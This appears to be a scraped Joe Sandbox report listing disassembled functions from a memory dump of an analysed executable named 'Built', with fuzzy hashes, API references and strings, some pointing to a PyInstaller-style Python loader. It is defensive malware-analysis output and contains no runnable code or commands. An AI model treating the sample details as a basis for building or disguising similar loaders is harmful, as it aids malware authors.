Instruction ID: 64e172a6924ab9a02530f0a7a4add7e0a4fbdbeb6c04cb98aca9ccd091dfbe65
Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
Instruction Fuzzy Hash: 4E515C62B2C3C5C6E724DE359811769E791E784794F889232CF6887EC6EE3DD4448B24

Function 00007FF76D5DCD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF76D5DD0AE

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction ID: e5f832655157ce572f697e2617fdce3f8b20c27b6b1a36821e8f3f022ae4058d
Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
Instruction Fuzzy Hash: CDA16762B2C7C6C6EB21DB25A0207B9BB94EB95B84F448032DE5D47B82FE3DD501C720

Function 00007FF76D5D7AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF76D5D7ACB

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
Instruction ID: fc2be89f2294a47f1daaef5bb5a629c62fc5696c87a6f9ec7bf01929a69ff23f
Opcode Fuzzy Hash: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
Instruction Fuzzy Hash: EE516F11F2C642D1FA64BA2659215BAD291AF54B84FC84435DE2E87FA7FE3CE8414238

Function 00007FF76D5E2790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF76D5E2794

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction ID: 48e1dd4418903b0ab992d9a978d05b92a030b784ef89c4c3f75ad853e80333a1
Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction Fuzzy Hash: 9FB09220E2BB86C2EA087B116C8622862A57F88712FE48038C80C81320EE3C20A54720

Function 00007FF76D5D28C0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction ID: f02c032f3063661ddad3f94a69cb8b3f65ef848fef529915281819b04f8b8548
Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction Fuzzy Hash: 7ED1D722A2C642D5F778AF25816027DA7A0EF45B48F944135CE2D07E96EF79D841C738

Function 00007FF76D5C8B20 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction ID: 0a025281eb2fc8711bad32e1e2091bf951baab1c13ddf3b949dff23caab08625
Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction Fuzzy Hash: 7AC1B4722142F18FD289FB29E45957A77D1F798309BD4402AEF8747F86CA3CA414DBA0

Function 00007FF76D5D1F30 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction ID: f462882c2b29ab65debf9ec8f0020504409993a8f907c132f11a4df2d2646ac5
Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction Fuzzy Hash: 77B1AB72A2C682C5E7749F29C06023CBBA0E745B48FA44135DF6E47B9AEF29D441C739

Function 00007FF76D5DD880 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction ID: c98245cdf3e15eb3b298559b471baca16ca799e080e41bf8cc8b005d36b8fd06
Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction Fuzzy Hash: E381F472A2C781C6E774DF199060379AA91EB85794F944236DEAD43F8AEE3DD0008F24

Function 00007FF76D5E5728 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
Instruction ID: dbc5e5d06c35592e01b9e38cd986d481630c7191c8687f823925605e4bf7433b
Opcode Fuzzy Hash: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
Instruction Fuzzy Hash: 9B61FC22E2C192C6F764BA28845027DE691AF58770FD44239DE6D86ED3FE7DE840C720

Function 00007FF76D5D1074 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: d401d793d1c66e74783c78ee5a05fbc6097fe9f88d7938a2f5c3e583baeb6d11
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 8B51A436A3C651C2E7249B29C060638B3A1EB45F68F644131CE6D47BD6EB3AE843C774

Function 00007FF76D5D1484 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: bc9c4f22bd2c52159c0c0964ac5820906752c6553ee21d5cc453a4e842399d30
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 4F519776A2C651C6E7249F29C050A3873A0EB45F68F644131CE6D07F96EF3AE843CB64

Function 00007FF76D5D0C64 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 922a578f8b4e6b5376339f7200aed2f14d870b1cc843865746e503277c1eec01
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 0751B932A2C651C6E7249B2EC06033CB7A0EB44B58F644132DE5C47BE6DB3AE843C764

Function 00007FF76D5D0E70 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 35e98d6d9a52b633b17cfc9fc36d94594908e4e2a0d988e9e0f6bcc66dfa1392
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 5F51A83662C651C6E7249B2DC06063C67A1EB44B58F644132CE5C57B96EF3AE843C774

Function 00007FF76D5D1280 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 918b201ee2bc26c7f48ec4f468257f63d3498faf27b87a5c1fb4b51fb253539f
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: D451C732A2CA51C5E7249B29C05063CB7A1EB44B98FA44131CE5D47F9AEF3AE842C774

Function 00007FF76D5D0A60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: c3bb1c53240b024c13acdc9ec167b3958b8ff69921a4e90cef4d359b12c1a06a
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 4651B536A2C651C5E7249B2EC06023CB7A0EB54B58F684132CE5D17B96EB3AEC43C774

Function 00007FF76D5D5040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: bb0db47b5e297ffacf5c0be77f62ebe13134261bcb18d8d6cc7094a9c487ac50
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: CA412456C2D74AC0E955995804303B4E780EF63BA1FE812B1CDF953FC7EC0D29868234

Function 00007FF76D5D91B0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction ID: e0355e1e2758a8ddeb3ddcfdad49e89385a648ca7278fc9e9eb81d7212f8495d
Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction Fuzzy Hash: F0411472728A55C2EF44DF2AD9241A9B3A2FB48FD0B899032DE1D97F59EE3CD0418714

Function 00007FF76D5D73F4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction ID: 62efee449dbb5ce1eaa0db9ed34f8127e22451b8529498f6a23c49bd1e9841c4
Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction Fuzzy Hash: 1231A731B2CB81C1E765AB25645013EAAD5AFC4B90F944239EE6E57F96EF3CD0014728

Function 00007FF76D5E8880 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction ID: f483d7ce9e84edf30249d1fa7b6447cc6bd6cc7a53bd8231c79335ddbf3ba245
Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction Fuzzy Hash: 2DF06871B2C695CEDB989F29A80263977D5F7483C0FC08439E68D83F04E67C94508F14

Function 00007FF76D5CC62C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction ID: e40fbbcfb63711e99d13c60721488184e6407954275cd923c248cdc5abfeaf44
Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction Fuzzy Hash: D7A0012192C927D0E648FB08E950135A220FB54301B801175D86E458A2AF2CA4418630

Function 00007FF76D5C50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C50C0
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5101
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5126
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C514B
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5173
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C519B
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51C3
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51EB
GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5213

Strings

Py_ExitStatusException, xrefs: 00007FF76D5C511C, 00007FF76D5C5138
Py_IsInitialized, xrefs: 00007FF76D5C5191, 00007FF76D5C51AD
PyErr_Restore, xrefs: 00007FF76D5C5399, 00007FF76D5C53B5
PyImport_ImportModule, xrefs: 00007FF76D5C5439, 00007FF76D5C5455
PyList_Append, xrefs: 00007FF76D5C5461, 00007FF76D5C547D
PyConfig_Read, xrefs: 00007FF76D5C5231, 00007FF76D5C524D
GetProcAddress, xrefs: 00007FF76D5C50E0
Py_Finalize, xrefs: 00007FF76D5C5141, 00007FF76D5C515D
PyEval_EvalCode, xrefs: 00007FF76D5C53C1, 00007FF76D5C53DD
PyObject_GetAttrString, xrefs: 00007FF76D5C5551, 00007FF76D5C556D
PyErr_Occurred, xrefs: 00007FF76D5C5349, 00007FF76D5C5365
PyErr_Print, xrefs: 00007FF76D5C5371, 00007FF76D5C538D
Py_DecodeLocale, xrefs: 00007FF76D5C50F7, 00007FF76D5C5113
PyUnicode_Decode, xrefs: 00007FF76D5C56B9, 00007FF76D5C56D5
Py_DecRef, xrefs: 00007FF76D5C50B6, 00007FF76D5C50D2
PyConfig_SetBytesString, xrefs: 00007FF76D5C5259, 00007FF76D5C5275
Py_InitializeFromConfig, xrefs: 00007FF76D5C5169, 00007FF76D5C5185
PyConfig_Clear, xrefs: 00007FF76D5C51E1, 00007FF76D5C51FD
PyErr_NormalizeException, xrefs: 00007FF76D5C5321, 00007FF76D5C533D
PyUnicode_FromFormat, xrefs: 00007FF76D5C5709, 00007FF76D5C5725
PyRun_SimpleStringFlags, xrefs: 00007FF76D5C55F1, 00007FF76D5C560D
PyImport_AddModule, xrefs: 00007FF76D5C53E9, 00007FF76D5C5405
Py_PreInitialize, xrefs: 00007FF76D5C51B9, 00007FF76D5C51D5
PyObject_Str, xrefs: 00007FF76D5C55A1, 00007FF76D5C55BD
